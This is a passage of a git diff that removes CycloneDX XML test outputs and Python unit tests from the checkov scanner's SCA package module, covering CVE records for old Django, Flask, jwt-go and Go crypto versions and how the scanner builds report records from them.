-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.</description>
-			<recommendation>Fixed in 0.0.2</recommendation>
-			<published>2020-12-17T06:15:00+01:00</published>
-			<affects>
-				<target>
-					<ref>pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="36ac1c61-974e-4f95-be44-8ec92552457a">
-			<id>CVE-2021-33203</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2021-33203</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2021-33203</url>
-					</source>
-					<score>4.9</score>
-					<severity>medium</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N</vector>
-				</rating>
-			</ratings>
-			<description>Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.</description>
-			<recommendation>Fixed in 2.2.24</recommendation>
-			<published>2021-06-08T20:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-	</vulnerabilities>
-</bom>
diff --git a/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml b/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml
deleted file mode 100644
index 62820b1cfcf..00000000000
--- a/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml
+++ /dev/null
@@ -1,367 +0,0 @@
-<?xml version="1.0" ?>
-<bom xmlns="http://cyclonedx.org/schema/bom/1.4" serialNumber="urn:uuid:98739a3a-2bf3-4987-a9bb-6ccbdf8a72ab" version="1">
-	<metadata>
-		<timestamp>2023-10-12T21:56:14.367737+00:00</timestamp>
-		<tools>
-			<tool>
-				<vendor>CycloneDX</vendor>
-				<name>cyclonedx-python-lib</name>
-				<version>5.0.0</version>
-				<externalReferences>
-					<reference type="build-system">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/actions</url>
-					</reference>
-					<reference type="distribution">
-						<url>https://pypi.org/project/cyclonedx-python-lib/</url>
-					</reference>
-					<reference type="documentation">
-						<url>https://cyclonedx-python-library.readthedocs.io/</url>
-					</reference>
-					<reference type="issue-tracker">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/issues</url>
-					</reference>
-					<reference type="license">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE</url>
-					</reference>
-					<reference type="release-notes">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md</url>
-					</reference>
-					<reference type="vcs">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib</url>
-					</reference>
-					<reference type="website">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/#readme</url>
-					</reference>
-				</externalReferences>
-			</tool>
-			<tool>
-				<vendor>bridgecrew</vendor>
-				<name>checkov</name>
-				<version>2.3.307</version>
-				<externalReferences>
-					<reference type="build-system">
-						<url>https://github.com/bridgecrewio/checkov/actions</url>
-					</reference>
-					<reference type="distribution">
-						<url>https://pypi.org/project/checkov/</url>
-					</reference>
-					<reference type="documentation">
-						<url>https://www.checkov.io/1.Welcome/What%20is%20Checkov.html</url>
-					</reference>
-					<reference type="issue-tracker">
-						<url>https://github.com/bridgecrewio/checkov/issues</url>
-					</reference>
-					<reference type="license">
-						<url>https://github.com/bridgecrewio/checkov/blob/master/LICENSE</url>
-					</reference>
-					<reference type="social">
-						<url>https://twitter.com/bridgecrewio</url>
-					</reference>
-					<reference type="vcs">
-						<url>https://github.com/bridgecrewio/checkov</url>
-					</reference>
-					<reference type="website">
-						<url>https://www.checkov.io/</url>
-					</reference>
-				</externalReferences>
-			</tool>
-		</tools>
-	</metadata>
-	<components>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2">
-			<name>django</name>
-			<version>1.2</version>
-			<licenses>
-				<license>
-					<name>OSI_BDS</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6">
-			<name>flask</name>
-			<version>0.6</version>
-			<licenses>
-				<license>
-					<name>DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE</name>
-				</license>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0">
-			<name>github.com/dgrijalva/jwt-go</name>
-			<version>v3.2.0</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41">
-			<name>github.com/miekg/dns</name>
-			<version>v1.1.41</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90">
-			<name>github.com/prometheus/client_model</name>
-			<version>v0.0.0-20190129233127-fd36f4220a90</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1">
-			<name>golang.org/x/crypto</name>
-			<version>v0.0.1</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0">
-			<name>requests</name>
-			<version>2.26.0</version>
-			<licenses>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0">
-			<name>requests</name>
-			<version>2.26.0</version>
-			<licenses>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0</purl>
-		</component>
-	</components>
-	<dependencies>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0"/>
-	</dependencies>
-	<vulnerabilities>
-		<vulnerability bom-ref="e77e882b-3658-4984-b866-63422653b9b8">
-			<id>CVE-2016-6186</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2016-6186</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2016-6186</url>
-					</source>
-					<score>6.1</score>
-					<severity>medium</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</vector>
-				</rating>
-			</ratings>
-			<description>Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.</description>
-			<recommendation>Fixed in 1.8.14</recommendation>
-			<published>2016-08-05T17:59:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="fa8ff9e3-4890-455b-b975-d9578aa21089">
-			<id>CVE-2016-7401</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2016-7401</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2016-7401</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N</vector>
-				</rating>
-			</ratings>
-			<description>The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.</description>
-			<recommendation>Fixed in 1.8.15</recommendation>
-			<published>2016-10-03T20:59:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="4713b0f8-713d-4d41-9798-f4db1f1ea77b">
-			<id>CVE-2018-1000656</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2018-1000656</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2018-1000656</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.</description>
-			<recommendation>Fixed in 0.12.3</recommendation>
-			<published>2018-08-20T21:31:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="61f577d3-9d45-40f9-abe1-789c51310c56">
-			<id>CVE-2019-1010083</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2019-1010083</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2019-1010083</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.</description>
-			<recommendation>Fixed in 1.0</recommendation>
-			<published>2019-07-17T16:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="ac6b3f4e-ff88-4448-ba44-bc87e00fa026">
-			<id>CVE-2019-19844</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2019-19844</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2019-19844</url>
-					</source>
-					<score>9.8</score>
-					<severity>critical</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</vector>
-				</rating>
-			</ratings>
-			<description>Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)</description>
-			<recommendation>Fixed in 1.11.27</recommendation>
-			<published>2019-12-18T20:15:00+01:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="48d28e3c-cdc6-4602-a81a-c688873c8823">
-			<id>CVE-2020-26160</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2020-26160</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2020-26160</url>
-					</source>
-					<score>7.7</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</vector>
-				</rating>
-			</ratings>
-			<description>jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\&quot;aud\&quot;] (which is allowed by the specification). Because the type assertion fails, \&quot;\&quot; is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.</description>
-			<recommendation>Fixed in 4.0.0rc1</recommendation>
-			<published>2020-09-30T20:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="999f9993-1812-424f-bb2f-583c49450fb4">
-			<id>CVE-2020-29652</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2020-29652</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2020-29652</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.</description>
-			<recommendation>Fixed in 0.0.2</recommendation>
-			<published>2020-12-17T06:15:00+01:00</published>
-			<affects>
-				<target>
-					<ref>pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="7b315a0a-127f-455a-9cda-44b6b6ce3296">
-			<id>CVE-2021-33203</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2021-33203</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2021-33203</url>
-					</source>
-					<score>4.9</score>
-					<severity>medium</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N</vector>
-				</rating>
-			</ratings>
-			<description>Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.</description>
-			<recommendation>Fixed in 2.2.24</recommendation>
-			<published>2021-06-08T20:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-	</vulnerabilities>
-</bom>
diff --git a/tests/sca_package/test_output.py b/tests/sca_package/test_output.py
deleted file mode 100644
index 9ae465ceb0b..00000000000
--- a/tests/sca_package/test_output.py
+++ /dev/null
@@ -1,665 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from packaging import version as packaging_version
-
-from checkov.common.bridgecrew.severities import BcSeverities, Severities
-from checkov.common.models.enums import CheckResult, ScanDataFormat
-from checkov.common.sca.output import create_report_cve_record, create_report_license_record
-from checkov.runner_filter import RunnerFilter
-from checkov.sca_package.output import (
-    calculate_lowest_compliant_version,
-    create_cli_cves_table,
-    create_cli_license_violations_table,
-    create_cli_output,
-    CveCount,
-)
-
-
-def get_vulnerabilities_details() -> list[dict[str, Any]]:
-    return [
-        {
-            "id": "CVE-2019-19844",
-            "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-            "cvss": 9.8,
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-            "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...",
-            "severity": "critical",
-            "packageName": "django",
-            "packageVersion": "1.2",
-            "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-            "riskFactors": [
-                "Attack complexity: low",
-                "Attack vector: network",
-                "Critical severity",
-                "Has fix",
-            ],
-            "impactedVersions": ["<1.11.27"],
-            "publishedDate": "2019-12-18T20:15:00+01:00",
-            "discoveredDate": "2019-12-18T19:15:00Z",
-            "fixDate": "2019-12-18T20:15:00+01:00",
-        },
-        {
-            "id": "CVE-2016-6186",
-            "status": "fixed in 1.9.8, 1.8.14",
-            "cvss": 6.1,
-            "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
-            "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function ...",
-            "severity": "medium",
-            "packageName": "django",
-            "packageVersion": "1.2",
-            "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186",
-            "riskFactors": [
-                "Attack complexity: low",
-                "Attack vector: network",
-                "Exploit exists",
-                "Has fix",
-                "Medium severity",
-            ],
-            "impactedVersions": ["<=1.8.13"],
-            "publishedDate": "2016-08-05T17:59:00+02:00",
-            "discoveredDate": "2016-08-05T15:59:00Z",
-            "fixDate": "2016-08-05T17:59:00+02:00",
-        },
-    ]
-
-
-def test_create_report_cve_record():
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    vulnerability_details = {
-        "id": "CVE-2019-19844",
-        "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-        "cvss": 9.8,
-        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-        "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...",
-        "severity": "critical",
-        "packageName": "django",
-        "packageVersion": "1.12",
-        "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-        "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"],
-        "impactedVersions": ["<1.11.27"],
-        "publishedDate": "2019-12-18T20:15:00+01:00",
-        "discoveredDate": "2019-12-18T19:15:00Z",
-        "fixDate": "2019-12-18T20:15:00+01:00",
-    }
-
-    # when
-    record = create_report_cve_record(
-        rootless_file_path=rootless_file_path,
-        file_abs_path=file_abs_path,
-        check_class=check_class,
-        vulnerability_details=vulnerability_details,
-        licenses='OSI_BDS',
-        package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-    )
-
-    # then
-    assert record.bc_check_id == "BC_CVE_2019_19844"
-    assert record.check_id == "CKV_CVE_2019_19844"
-    assert record.check_class == check_class
-    assert record.check_name == "SCA package scan"
-    assert record.check_result == {"result": CheckResult.FAILED}
-    assert record.code_block == [(0, "django: 1.12")]
-    assert (
-        record.description
-        == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..."
-    )
-    assert record.file_abs_path == file_abs_path
-    assert record.file_line_range == [0, 0]
-    assert record.file_path == f"/{rootless_file_path}"
-    assert record.repo_file_path == file_abs_path
-    assert record.resource == "requirements.txt.django"
-    assert record.severity == Severities[BcSeverities.CRITICAL]
-    assert record.short_description == "CVE-2019-19844 - django: 1.12"
-    assert record.vulnerability_details["status"] == "fixed in 3.0.1, 2.2.9, 1.11.27"
-    assert record.vulnerability_details["lowest_fixed_version"] == "2.2.9"
-    assert record.vulnerability_details["fixed_versions"] == [
-        packaging_version.parse("3.0.1"),
-        packaging_version.parse("2.2.9"),
-    ]
-    assert record.vulnerability_details["licenses"] == 'OSI_BDS'
-
-
-def test_create_report_cve_record_results_from_platform():
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    vulnerability_details = {
-                "severity": "CRITICAL",
-                "riskFactors": "{\"Critical severity\":{},\"Attack vector: network\":{},\"Has fix\":{},\"Attack complexity: low\":{}}",
-                "id": "CVE-2019-19844",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-                "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",
-                "packageVersion": "1.2",
-                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-                "packageName": "django",
-                "publishedDate": "2019-12-18T19:15:00Z",
-                "cvss": 9.8,
-                "status": "OPEN",
-                "cveStatus": "1.11.27",
-                "fileMetadataId": "d9f631f2-86b3-4d47-9b23-a2529c255392",
-                "ViolationResource": {
-                    "scannerType": "Twistcli",
-                    "customerName": "ipeleg",
-                    "status": "OPEN",
-                    "firstDetectionDate": None,
-                    "updatedDate": "2022-08-23T09:37:27.207Z",
-                    "resourceId": "/packages/requirements.txt",
-                    "violationId": "BC_VUL_2",
-                    "sourceId": "itai1357/terragoat1",
-                    "ticket": None,
-                    "metadataFixId": None,
-                    "originalResourceDefinition": None,
-                    "fixedResourceDefinition": None,
-                    "errorLine": None,
-                    "resourcePlanId": None,
-                    "errorLines": None,
-                    "variableCode": None,
-                    "variableFixCode": None,
-                    "resourceFixCode": None,
-                    "gitBlameMetadataId": None
-                },
-                "isRootPackage": None,
-                "packageId": "49d27c4c-68cc-4eeb-ab98-d40a11334fdf",
-                "causePackageId": "49d27c4c-68cc-4eeb-ab98-d40a11334fdf",
-            }
-
-    # when
-    record = create_report_cve_record(
-        rootless_file_path=rootless_file_path,
-        file_abs_path=file_abs_path,
-        check_class=check_class,
-        vulnerability_details=vulnerability_details,
-        licenses='OSI_BDS',
-        scan_data_format=ScanDataFormat.PLATFORM,
-        package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-    )
-
-    # then
-
-    # in the case of scan_data_format=ScanDataFormat.FROM_PLATFORM we just have to make sure that 'status' and
-    # 'fix_version' are as expected, as the rest are the same as in default flow
-    # (can_data_format=ScanDataFormat.FROM_TWISTCLI)
-    assert "lowest_fixed_version" not in record.vulnerability_details
-    assert "fixed_versions" not in record.vulnerability_details
-    assert record.vulnerability_details["fix_version"] == '1.11.27'
-
-
-def test_create_report_cve_record_moderate_severity():
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    vulnerability_details = {
-        "id": "CVE-2019-19844",
-        "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-        "cvss": 9.8,
-        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-        "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...",
-        "severity": "moderate",
-        "packageName": "django",
-        "packageVersion": "1.2",
-        "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-        "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"],
-        "impactedVersions": ["<1.11.27"],
-        "publishedDate": "2019-12-18T20:15:00+01:00",
-        "discoveredDate": "2019-12-18T19:15:00Z",
-        "fixDate": "2019-12-18T20:15:00+01:00",
-    }
-
-    # when
-    record = create_report_cve_record(
-        rootless_file_path=rootless_file_path,
-        file_abs_path=file_abs_path,
-        check_class=check_class,
-        vulnerability_details=vulnerability_details,
-        licenses='OSI_BDS',
-        package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-    )
-
-    # then
-    assert record.severity == Severities[BcSeverities.MEDIUM]
-
-
-def test_create_report_cve_record_severity_filter():
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    vulnerability_details = {
-        "id": "CVE-2019-19844",
-        "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-        "cvss": 9.8,
-        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-        "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...",
-        "severity": "moderate",
-        "packageName": "django",
-        "packageVersion": "1.2",
-        "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-        "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"],
-        "impactedVersions": ["<1.11.27"],
-        "publishedDate": "2019-12-18T20:15:00+01:00",
-        "discoveredDate": "2019-12-18T19:15:00Z",
-        "fixDate": "2019-12-18T20:15:00+01:00",
-    }
-
-    # when
-    record = create_report_cve_record(
-        rootless_file_path=rootless_file_path,
-        file_abs_path=file_abs_path,
-        check_class=check_class,
-        vulnerability_details=vulnerability_details,
-        runner_filter=RunnerFilter(checks=['HIGH']),
-        licenses='OSI_BDS',
-        package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-    )
-
-    # then
-    assert record.bc_check_id == "BC_CVE_2019_19844"
-    assert record.check_id == "CKV_CVE_2019_19844"
-    assert record.check_class == check_class
-    assert record.check_name == "SCA package scan"
-    assert record.check_result == {"result": CheckResult.SKIPPED, 'suppress_comment': 'Filtered by severity'}
-    assert record.code_block == [(0, "django: 1.2")]
-    assert (
-        record.description
-        == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..."
-    )
-    assert record.file_abs_path == file_abs_path
-    assert record.file_line_range == [0, 0]
-    assert record.file_path == f"/{rootless_file_path}"
-    assert record.repo_file_path == file_abs_path
-    assert record.resource == "requirements.txt.django"
-    assert record.severity == Severities[BcSeverities.MEDIUM]
-    assert record.short_description == "CVE-2019-19844 - django: 1.2"
-    assert record.vulnerability_details["lowest_fixed_version"] == "1.11.27"
-    assert record.vulnerability_details["fixed_versions"] == [
-        packaging_version.parse("3.0.1"),
-        packaging_version.parse("2.2.9"),
-        packaging_version.parse("1.11.27"),
-    ]
-    assert record.vulnerability_details["licenses"] == 'OSI_BDS'
-
-
-def test_create_report_cve_record_package_filter():
-    # given
-    rootless_file_path = "requirements.txt"
-    file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
-    vulnerability_details = {
-        "id": "CVE-2019-19844",
-        "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-        "cvss": 9.8,
-        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-        "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...",
-        "severity": "critical",
-        "packageName": "django",
-        "packageVersion": "1.2",
-        "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-        "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"],
-        "impactedVersions": ["<1.11.27"],
-        "publishedDate": "2019-12-18T20:15:00+01:00",
-        "discoveredDate": "2019-12-18T19:15:00Z",
-        "fixDate": "2019-12-18T20:15:00+01:00",
-    }
-
-    # when
-    record = create_report_cve_record(
-        rootless_file_path=rootless_file_path,
-        file_abs_path=file_abs_path,
-        check_class=check_class,
-        vulnerability_details=vulnerability_details,
-        runner_filter=RunnerFilter(skip_cve_package=['django', 'requests']),
-        licenses='OSI_BDS',
-        package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False},
-    )
-
-    # then
-    assert record.bc_check_id == "BC_CVE_2019_19844"
-    assert record.check_id == "CKV_CVE_2019_19844"
-    assert record.check_class == check_class
-    assert record.check_name == "SCA package scan"
